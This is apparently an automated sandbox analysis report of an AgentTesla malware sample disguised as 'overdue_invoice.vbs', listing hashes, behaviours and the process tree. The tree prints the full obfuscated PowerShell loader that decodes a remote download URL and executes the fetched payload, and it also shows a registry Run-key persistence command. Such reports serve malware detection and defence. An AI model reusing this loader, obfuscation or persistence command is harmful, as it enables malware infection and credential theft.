Analysis

  • max time kernel
    141s
  • max time network
    147s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    03-06-2024 09:18

General

  • Target

    overdue_invoice.vbs

  • Size

    15KB

  • MD5

    7078829e255df55f25a8bcaa9bdaffb4

  • SHA1

    1bcacd12305661a2dedecb4eb6f8ad57ae5d672e

  • SHA256

    d16ea5d6d40c9020b99032eaefab9b62f3c63bae12d24103a6b10ac5a2dcd34c

  • SHA512

    4d56cc648febb1c0dceb44e41415cb30a9e975997f5d3fa67b97e2a039d6068f383e285daeb39b50eb0b18bd1a1c5c102544f2670e54e3109cff74d6268e1495

  • SSDEEP

    192:ulJUFFdUTxfDs+rHw7FEFggnliEWHxg40HG5Q6MkouP0L3gwJSi3qMFP6WPS6vMy:ulCHkxNrHwhEjiIvkJ8LJRY4Er8saQa

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Blocklisted process makes network request 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\overdue_invoice.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2952
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Stigereols147 = 1;Function Acarpelous($refried){$Oisen=$refried.Length-$Stigereols147;$Kredsret='Substring';For( $Simulationerne=5;$Simulationerne -lt $Oisen;$Simulationerne+=6){$Kassestrimlen+=$refried.$Kredsret.Invoke( $Simulationerne, $Stigereols147);}$Kassestrimlen;}function Sulfide($Honning){ . ($Rorgngeres204) ($Honning);}$Illumination=Acarpelous 'Je,miMSpor oInkohzGivenipalsilBerlil ParaaGaslo/Thers5,uman.Provi0 Mumm mid,(Geoc,W Jul iBit,enYtterdOdiseoh.gstwStukkschill ,rodNpenisT Cowl Exhib1Dknin0Udpla.super0Toldk;Sul o nostrWCreopiUd rin Bum 6Br ds4 Eras;Peric Ah,hox Le,c6laxat4Vider;relat Zaca.r nedkvBrod,:Trira1S.atu2d,str1S bin.Br.ak0Desa ) Filu UnknoG Fea,eFluthcNakkek MissoRespo/Struc2Halfp0S,ill1 farv0parag0 Hand1 Aq,i0Nond.1esu.i IndivFE mesiOverdrIndiseBlit fHovedo MappxAngel/Dick 1Toure2Brode1Toena.Moist0Gaffe ';$feststemning=Acarpelous 'To,arUSnefosFiraaePlimsrEpico-GenneA ,hargBagsieGu vmnAnimatSubst ';$Prominences=Acarpelous 'Ja kahRe,akt Decot AncopUncomsElaeo:Umenn/F,kke/E.istwMaanew HemmwRatch.Monopideglun .utonPseu oCemenv IndgaRarettMirabiWagewv Klase Firmb MauvuClou,iMultil,ercud Insti F kans kkygAr,ansslangospilplunperuN.gattCrocoiHartloSer,inInco.sJumbo. ForviReplynExtra/,hokowudvi pKlu.d-,lushcSka,eoLegion Tript polyeSnobbnEkspetFo.mn/SolbluDe.umpStrubl UnhooBistaa SulpdPureesUrina/perl,gM.wchrOpfosaRegisvanisoikvanttFrokoyDefo,_UnbehfSmd,doTheavr Im.amR.evosan va/steerhAnten/KlapjdNymph/.vrdebIndst/Us gegSpr,n/VassiUUkonvdBaguepUnverlRaspbaSkrignKabletLyv knAdveniRigelnAfsvegHvir,eRets,nGravm.Deod,u Trol3Ptole2Byg,e ';$Romanbladsstil199=Acarpelous 'Non.n>Reall ';$Rorgngeres204=Acarpelous 'Elefai Te.teVegetxEn ar ';$Pruderies71='Federalistisk';$Springdanses = Acarpelous 'Hjerte Ba.dcTnkemhStberoMonon ,amme%Recoma V,jlpTranepG lledBefo,aDeplatbrneeamoist%N fig\ConfeS,ariekBeflerWhalemHast.eBesnatforsk.AttenKGavltlBe.iei Nonp Ticto&Unrel&Kotwa Ejac,eFhovecpr enh ransoBdell Skrnetaaret ';Sulfide (Acarpelous 'Ques $ Chipg PudelSlf,noFlussbha noaUntralEtymo:SkakmHExtraoIldfumRektoouafklg ,unaeJordnnTelegeUge aoUnagiuaftalsGyl en Ligne a tesDis,isCoxale Undes cada= niv(AdkomcUnc,ymUnde dSumpt Toyma/Filibc,anca Dueho$ElinoSFuldsp Ace,r lutbiUdrednTngergForwad Dr.laNonaunRe.ols ,eceeImmunsNed.j)Skotj ');Sulfide (Acarpelous ' Bain$Re.ragT.verlB.nego Vissb Mee aTr,inlBetje:Cuckonbrys,rNrmesiTervan revegPolycs BlokbEr.iar CalaeChandvBrudge O ernUdfaneDesmo=raptu$Br ndP lfodr ,impoEn otm dditi igurnLejdeeFeodanOospocforudeSpytssGrips.Trivas AreapFamillKodesiAfdmptunrec(Hunde$Z.mopR gelaoB.figmHeadeaIncepnAtelobAmmunlHundeaT illdIsdansTorc,sMannatVoussiWo,sll Bide1Parge9Scrie9 Yami)tyran ');$Prominences=$nringsbrevene[0];$Nondeformity= (Acarpelous 'T.ktr$Triecg,ondolBo,yboTransbBackgaNegerlSmok,:.burgRMinimeOvermpOp.aviBank.qstanduMilieiVejr nCommogBefol=OvertN BetreStudiwThree-KildeO.utpubAksiaj KkkeeGennecNephrtVilje SuboSUdpeny B.ttsSkrmttLat,eeflivvmb,ufr.FolkeN Fin,eStuditChefk.Bair WMarchePre.rbGeoboCVaccilBoutfiunemoeGlasknTeglst');$Nondeformity+=$Homogeneousnesses[1];Sulfide ($Nondeformity);Sulfide (Acarpelous ' psti$RegioRTroskePissap TingiAn.icqGeninuTam yiHykl nIllingFoxed.GalloH SlipeArmitahuslgdFlageeIsidorIambisMod.r[sandh$NomasfChance Kin.sTremotgametsCot.ltJet ieslingm Naegn PurpiSocianoplseg Stjk] Ek.t=Con,i$ReassIunparl,ngaglFolkeuPluvim In.biKrigsnTumpeaFaitetGhettiTaffeoH slinNonth ');$Betnkning=Acarpelous 'Neg e$Text RKitleeUnderp OrthiAgtsoqAn.gau.trikiRhyminMaintgIn.er.MhedeDInkasoC kerwSeks,n Ildkl CircoNonpraUbetadArbejFStiftiB.egelRetinePi,op(Sdest$Lag aPMaturrMellaoKighumUnderiahousnKapitePondanAc.ckc,ogeneGrappsFigh,,Ritua$ArmounT ylle CorrwF,eddiPrangeOlfac) Velk ';$newie=$Homogeneousnesses[0];Sulfide (Acarpelous 'Halvp$AllicgScl,rlSki,fotric,bElitaaSlav,lPheny:Ree aEpreclflilj.tCeveneAarsorErhvem TimeoKonomd OuthnI.olaiWitchnPeriggCardieHianar asianCausteC rot=Necr (MurenTEksameMonotsSt rltOutbo- NonsPS,ruma tilstMacr.hSemid Fina $RecodnRetsveMet.lwCottoiObligePetro)Betaf ');while (!$Eftermodningerne) {Sulfide (Acarpelous 'Regis$Unsusg hairlRhibioSleekbps udaMystilNek,b:ErhveBPhenoe zuccnJoshicImpr hUndec=Gt.fd$Ski.nt.utbirTr riuOps,meRish. ') ;Sulfide $Betnkning;Sulfide (Acarpelous 'geogrSAut,rtExtraaRadiorKitaktMison-,reotS aurlS.xofeSi,gleDrearp mo,o S,ill4Antro ');Sulfide (Acarpelous 'skval$.ebragTildelFusaro ErhvbOmbytaHypotlForbe:Coen.EForsgf IkratHrfreeSensirApropm Rakeo Un,xd precnBrkkei efeanSkrifgPinnaeOpinarHetern PneueSulfo=Gulsp( Os.iTGene,eF rstsw.isttFunkt-ProrhPIndkoaPseudt G,ldhAfroh Sk at$StaminViljeeUnderwRearriTr.wle oldf)Anlbs ') ;Sulfide (Acarpelous ' Olie$BloksgUnderlBairnoHelleb tjgeaDroemlDetri: JudaScalviuYderlbSpiraaAlarmlTa,eaa HandrModery sy,h=Carib$S,lvugUddeblBornaoWe nib Arbea tv dlKalkb:Cell.AbravokJolletBrydeaId.emnBefritS jsim J meoSpecidChiefeUtjenl.ovedlBeworeEnergrAmpel+G,uli+Laa e% Tok.$MembrnBgersrteoreiLi innTachygSynsvssprogb H,terRaceteRensev IndseGtemanMageseDi,si.BirnacAbalaoGantzuSkattn M.totmi.ro ') ;$Prominences=$nringsbrevene[$Subalary];}$Grdris=340707;$Filtraters=28431;Sulfide (Acarpelous 'unsup$ ProggFedtelAfkogoEmpirb K keaDaktyl Gom :E,dodJHuldsoRegnsuNowsorVid on Risoa Na ulDial.iDebatsselefeKalder KrysiLuftfn Colog AchisMor esOptagyHornssAlliktAlfoneStickmDesti Spri,=T.adi SkilGSkraae Parat Wien- El,cCtrophoSheddnBrigitResineApokanOplyst Melo Ogal,$ Pup,nShitte Tromw,lidfiBj.ine ooti ');Sulfide (Acarpelous ' Stig$CognogKasseluntraoLandbb MentaDeduclMokop: DoriTChocko SumexA,resiAs,aypM scrhUnd roFrailbunforiVest.aHuckl Vivia=Skram Subso[NazieSBitcoysurclsEm.rgtFol.eeReshomPromi.P senC Sky.oNeonrn berevCrable Talnr AnaptAllon]Syphi:Phyll:sy teF ,jakrTrituoscaphmRostrBSprjtaAttensP romePatri6Bogme4 ZoonSPa.pytSupe,rSiksai Chann ShacgLo,ns( larl$TephrJRrt.goBriaruLikinrF.rdenRegeaaReci lAwakeiPreshssu eretndesr AfstiLowpan VaregBordbs Arc,sUhomoyDellss,econtmeline,jtidmmoney)stift ');Sulfide (Acarpelous 'Rets,$ olangMcguilgrou oAgrosbObseraFantolRigsa:Renhog PsycacountfMaa ef Au oe B,sslPitheeClassnUltrasHvorb Kist=.aget Sarce[A.bedSfilasytyktasU dattPeniteFall,mTilra. SgeoT PrieeAvoidxRetrat P ro. Pl.nE.demanSmaabcRgbomoTe rndMotiviKvartn BraggKerit]Outbr: Urte: BestACouncSSecu.CTern.I OldbI,nsta.,onraGAg ree De atRe,urS elintEi.htrRetski,nternCanvagmaale(Ly.ns$BlomsTAphyroSufflx.ecidiHarlepAnti hMignioPol.rbFortri ullaaloomf)Bran, ');Sulfide (Acarpelous ',ndfr$Fluatgre,lplNy edoMetembIlliqa VilllReolp: AgteNRundho GennnforeptKojikoUnvicrBrenntGun,tuNazifoGeisauFourdsChum.=Non.x$Indigg Un,raEjectf VuggfR.tsheOli olOv rpeFolken Grapsf,imr.,iskosFor.yuMark b lugsSlidst Hjerr.utleiCovennTunnegF okk(Wille$OplgnG SyngrAggredEru,erDropliVita s Vaab, ekst$ sociF ThymiZach,lDrejet BedorOptrya ,nartUtopieExuberQuatesMigsh) Anti ');Sulfide $Nontortuous;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2156
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Skrmet.Kli && echo t"
        3⤵
          PID:2636
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Stigereols147 = 1;Function Acarpelous($refried){$Oisen=$refried.Length-$Stigereols147;$Kredsret='Substring';For( $Simulationerne=5;$Simulationerne -lt $Oisen;$Simulationerne+=6){$Kassestrimlen+=$refried.$Kredsret.Invoke( $Simulationerne, $Stigereols147);}$Kassestrimlen;}function Sulfide($Honning){ . ($Rorgngeres204) ($Honning);}$Illumination=Acarpelous 'Je,miMSpor oInkohzGivenipalsilBerlil ParaaGaslo/Thers5,uman.Provi0 Mumm mid,(Geoc,W Jul iBit,enYtterdOdiseoh.gstwStukkschill ,rodNpenisT Cowl Exhib1Dknin0Udpla.super0Toldk;Sul o nostrWCreopiUd rin Bum 6Br ds4 Eras;Peric Ah,hox Le,c6laxat4Vider;relat Zaca.r nedkvBrod,:Trira1S.atu2d,str1S bin.Br.ak0Desa ) Filu UnknoG Fea,eFluthcNakkek MissoRespo/Struc2Halfp0S,ill1 farv0parag0 Hand1 Aq,i0Nond.1esu.i IndivFE mesiOverdrIndiseBlit fHovedo MappxAngel/Dick 1Toure2Brode1Toena.Moist0Gaffe ';$feststemning=Acarpelous 'To,arUSnefosFiraaePlimsrEpico-GenneA ,hargBagsieGu vmnAnimatSubst ';$Prominences=Acarpelous 'Ja kahRe,akt Decot AncopUncomsElaeo:Umenn/F,kke/E.istwMaanew HemmwRatch.Monopideglun .utonPseu oCemenv IndgaRarettMirabiWagewv Klase Firmb MauvuClou,iMultil,ercud Insti F kans kkygAr,ansslangospilplunperuN.gattCrocoiHartloSer,inInco.sJumbo. ForviReplynExtra/,hokowudvi pKlu.d-,lushcSka,eoLegion Tript polyeSnobbnEkspetFo.mn/SolbluDe.umpStrubl UnhooBistaa SulpdPureesUrina/perl,gM.wchrOpfosaRegisvanisoikvanttFrokoyDefo,_UnbehfSmd,doTheavr Im.amR.evosan va/steerhAnten/KlapjdNymph/.vrdebIndst/Us gegSpr,n/VassiUUkonvdBaguepUnverlRaspbaSkrignKabletLyv knAdveniRigelnAfsvegHvir,eRets,nGravm.Deod,u Trol3Ptole2Byg,e ';$Romanbladsstil199=Acarpelous 'Non.n>Reall ';$Rorgngeres204=Acarpelous 'Elefai Te.teVegetxEn ar ';$Pruderies71='Federalistisk';$Springdanses = Acarpelous 'Hjerte Ba.dcTnkemhStberoMonon ,amme%Recoma V,jlpTranepG lledBefo,aDeplatbrneeamoist%N fig\ConfeS,ariekBeflerWhalemHast.eBesnatforsk.AttenKGavltlBe.iei Nonp Ticto&Unrel&Kotwa Ejac,eFhovecpr enh ransoBdell Skrnetaaret ';Sulfide (Acarpelous 'Ques $ Chipg PudelSlf,noFlussbha noaUntralEtymo:SkakmHExtraoIldfumRektoouafklg ,unaeJordnnTelegeUge aoUnagiuaftalsGyl en Ligne a tesDis,isCoxale Undes cada= niv(AdkomcUnc,ymUnde dSumpt Toyma/Filibc,anca Dueho$ElinoSFuldsp Ace,r lutbiUdrednTngergForwad Dr.laNonaunRe.ols ,eceeImmunsNed.j)Skotj ');Sulfide (Acarpelous ' Bain$Re.ragT.verlB.nego Vissb Mee aTr,inlBetje:Cuckonbrys,rNrmesiTervan revegPolycs BlokbEr.iar CalaeChandvBrudge O ernUdfaneDesmo=raptu$Br ndP lfodr ,impoEn otm dditi igurnLejdeeFeodanOospocforudeSpytssGrips.Trivas AreapFamillKodesiAfdmptunrec(Hunde$Z.mopR gelaoB.figmHeadeaIncepnAtelobAmmunlHundeaT illdIsdansTorc,sMannatVoussiWo,sll Bide1Parge9Scrie9 Yami)tyran ');$Prominences=$nringsbrevene[0];$Nondeformity= (Acarpelous 'T.ktr$Triecg,ondolBo,yboTransbBackgaNegerlSmok,:.burgRMinimeOvermpOp.aviBank.qstanduMilieiVejr nCommogBefol=OvertN BetreStudiwThree-KildeO.utpubAksiaj KkkeeGennecNephrtVilje SuboSUdpeny B.ttsSkrmttLat,eeflivvmb,ufr.FolkeN Fin,eStuditChefk.Bair WMarchePre.rbGeoboCVaccilBoutfiunemoeGlasknTeglst');$Nondeformity+=$Homogeneousnesses[1];Sulfide ($Nondeformity);Sulfide (Acarpelous ' psti$RegioRTroskePissap TingiAn.icqGeninuTam yiHykl nIllingFoxed.GalloH SlipeArmitahuslgdFlageeIsidorIambisMod.r[sandh$NomasfChance Kin.sTremotgametsCot.ltJet ieslingm Naegn PurpiSocianoplseg Stjk] Ek.t=Con,i$ReassIunparl,ngaglFolkeuPluvim In.biKrigsnTumpeaFaitetGhettiTaffeoH slinNonth ');$Betnkning=Acarpelous 'Neg e$Text RKitleeUnderp OrthiAgtsoqAn.gau.trikiRhyminMaintgIn.er.MhedeDInkasoC kerwSeks,n Ildkl CircoNonpraUbetadArbejFStiftiB.egelRetinePi,op(Sdest$Lag aPMaturrMellaoKighumUnderiahousnKapitePondanAc.ckc,ogeneGrappsFigh,,Ritua$ArmounT ylle CorrwF,eddiPrangeOlfac) Velk ';$newie=$Homogeneousnesses[0];Sulfide (Acarpelous 'Halvp$AllicgScl,rlSki,fotric,bElitaaSlav,lPheny:Ree aEpreclflilj.tCeveneAarsorErhvem TimeoKonomd OuthnI.olaiWitchnPeriggCardieHianar asianCausteC rot=Necr (MurenTEksameMonotsSt rltOutbo- NonsPS,ruma tilstMacr.hSemid Fina $RecodnRetsveMet.lwCottoiObligePetro)Betaf ');while (!$Eftermodningerne) {Sulfide (Acarpelous 'Regis$Unsusg hairlRhibioSleekbps udaMystilNek,b:ErhveBPhenoe zuccnJoshicImpr hUndec=Gt.fd$Ski.nt.utbirTr riuOps,meRish. ') ;Sulfide $Betnkning;Sulfide (Acarpelous 'geogrSAut,rtExtraaRadiorKitaktMison-,reotS aurlS.xofeSi,gleDrearp mo,o S,ill4Antro ');Sulfide (Acarpelous 'skval$.ebragTildelFusaro ErhvbOmbytaHypotlForbe:Coen.EForsgf IkratHrfreeSensirApropm Rakeo Un,xd precnBrkkei efeanSkrifgPinnaeOpinarHetern PneueSulfo=Gulsp( Os.iTGene,eF rstsw.isttFunkt-ProrhPIndkoaPseudt G,ldhAfroh Sk at$StaminViljeeUnderwRearriTr.wle oldf)Anlbs ') ;Sulfide (Acarpelous ' Olie$BloksgUnderlBairnoHelleb tjgeaDroemlDetri: JudaScalviuYderlbSpiraaAlarmlTa,eaa HandrModery sy,h=Carib$S,lvugUddeblBornaoWe nib Arbea tv dlKalkb:Cell.AbravokJolletBrydeaId.emnBefritS jsim J meoSpecidChiefeUtjenl.ovedlBeworeEnergrAmpel+G,uli+Laa e% Tok.$MembrnBgersrteoreiLi innTachygSynsvssprogb H,terRaceteRensev IndseGtemanMageseDi,si.BirnacAbalaoGantzuSkattn M.totmi.ro ') ;$Prominences=$nringsbrevene[$Subalary];}$Grdris=340707;$Filtraters=28431;Sulfide (Acarpelous 'unsup$ ProggFedtelAfkogoEmpirb K keaDaktyl Gom :E,dodJHuldsoRegnsuNowsorVid on Risoa Na ulDial.iDebatsselefeKalder KrysiLuftfn Colog AchisMor esOptagyHornssAlliktAlfoneStickmDesti Spri,=T.adi SkilGSkraae Parat Wien- El,cCtrophoSheddnBrigitResineApokanOplyst Melo Ogal,$ Pup,nShitte Tromw,lidfiBj.ine ooti ');Sulfide (Acarpelous ' Stig$CognogKasseluntraoLandbb MentaDeduclMokop: DoriTChocko SumexA,resiAs,aypM scrhUnd roFrailbunforiVest.aHuckl Vivia=Skram Subso[NazieSBitcoysurclsEm.rgtFol.eeReshomPromi.P senC Sky.oNeonrn berevCrable Talnr AnaptAllon]Syphi:Phyll:sy teF ,jakrTrituoscaphmRostrBSprjtaAttensP romePatri6Bogme4 ZoonSPa.pytSupe,rSiksai Chann ShacgLo,ns( larl$TephrJRrt.goBriaruLikinrF.rdenRegeaaReci lAwakeiPreshssu eretndesr AfstiLowpan VaregBordbs Arc,sUhomoyDellss,econtmeline,jtidmmoney)stift ');Sulfide (Acarpelous 'Rets,$ olangMcguilgrou oAgrosbObseraFantolRigsa:Renhog PsycacountfMaa ef Au oe B,sslPitheeClassnUltrasHvorb Kist=.aget Sarce[A.bedSfilasytyktasU dattPeniteFall,mTilra. SgeoT PrieeAvoidxRetrat P ro. Pl.nE.demanSmaabcRgbomoTe rndMotiviKvartn BraggKerit]Outbr: Urte: BestACouncSSecu.CTern.I OldbI,nsta.,onraGAg ree De atRe,urS elintEi.htrRetski,nternCanvagmaale(Ly.ns$BlomsTAphyroSufflx.ecidiHarlepAnti hMignioPol.rbFortri ullaaloomf)Bran, ');Sulfide (Acarpelous ',ndfr$Fluatgre,lplNy edoMetembIlliqa VilllReolp: AgteNRundho GennnforeptKojikoUnvicrBrenntGun,tuNazifoGeisauFourdsChum.=Non.x$Indigg Un,raEjectf VuggfR.tsheOli olOv rpeFolken Grapsf,imr.,iskosFor.yuMark b lugsSlidst Hjerr.utleiCovennTunnegF okk(Wille$OplgnG SyngrAggredEru,erDropliVita s Vaab, ekst$ sociF ThymiZach,lDrejet BedorOptrya ,nartUtopieExuberQuatesMigsh) Anti ');Sulfide $Nontortuous;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1964
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Skrmet.Kli && echo t"
            4⤵
              PID:2424
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:2112
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "tonsillectomic" /t REG_EXPAND_SZ /d "%Rundsavsbladene% -w 1 $sartor=(Get-ItemProperty -Path 'HKCU:\Codebtors\').Typeregningens;%Rundsavsbladene% ($sartor)"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:1800
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "tonsillectomic" /t REG_EXPAND_SZ /d "%Rundsavsbladene% -w 1 $sartor=(Get-ItemProperty -Path 'HKCU:\Codebtors\').Typeregningens;%Rundsavsbladene% ($sartor)"
                  6⤵
                  • Adds Run key to start application
                  • Modifies registry key
                  PID:2408

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6J4520554E2X6SS5OMAQ.temp

        Filesize

        7KB

        MD5

        a827ff99cbccfab8cc86b1c1fecc9021

        SHA1

        911690184d451687ed5fa08601a9b93387ac97b5

        SHA256

        262b2a2744c9e11590a9659239470480c3f690ade183679cb9914a9e4cc88594

        SHA512

        9e89423da63c455fe9d5ed715f8dd917826a849f372b09546473593efe117b7719aeb5fab180d0ed0ec1ee4495ef2717e460b21c7a453d0273c2bcd4b6e0179f

      • C:\Users\Admin\AppData\Roaming\Skrmet.Kli

        Filesize

        480KB

        MD5

        9916e5a5f7afe8c1f861f93999a875f3

        SHA1

        8d1f119fcb5942cd8e71f3bb1fc527c2a74549cc

        SHA256

        97cebd696b9e5587ba0a101e2cdabf9bf01ab268d354408fdc349085760579df

        SHA512

        30b0c3b929218288998b7578672872d84e5fd810543b77de153033b491b0dd9472ccaa711b448fcbd9ccc9a67888e3439aeea5d1c13b2860f1f480a325a24edc

      • memory/1964-17-0x0000000006680000-0x000000000A2DC000-memory.dmp

        Filesize

        60.4MB

      • memory/2112-34-0x0000000000AC0000-0x0000000000B00000-memory.dmp

        Filesize

        256KB

      • memory/2112-32-0x0000000000AC0000-0x0000000001B22000-memory.dmp

        Filesize

        16.4MB

      • memory/2156-10-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

        Filesize

        9.6MB

      • memory/2156-4-0x000007FEF5F7E000-0x000007FEF5F7F000-memory.dmp

        Filesize

        4KB

      • memory/2156-9-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

        Filesize

        9.6MB

      • memory/2156-7-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

        Filesize

        9.6MB

      • memory/2156-16-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

        Filesize

        9.6MB

      • memory/2156-8-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

        Filesize

        9.6MB

      • memory/2156-18-0x000007FEF5F7E000-0x000007FEF5F7F000-memory.dmp

        Filesize

        4KB

      • memory/2156-6-0x00000000027A0000-0x00000000027A8000-memory.dmp

        Filesize

        32KB

      • memory/2156-33-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp

        Filesize

        9.6MB

      • memory/2156-5-0x000000001B5F0000-0x000000001B8D2000-memory.dmp

        Filesize

        2.9MB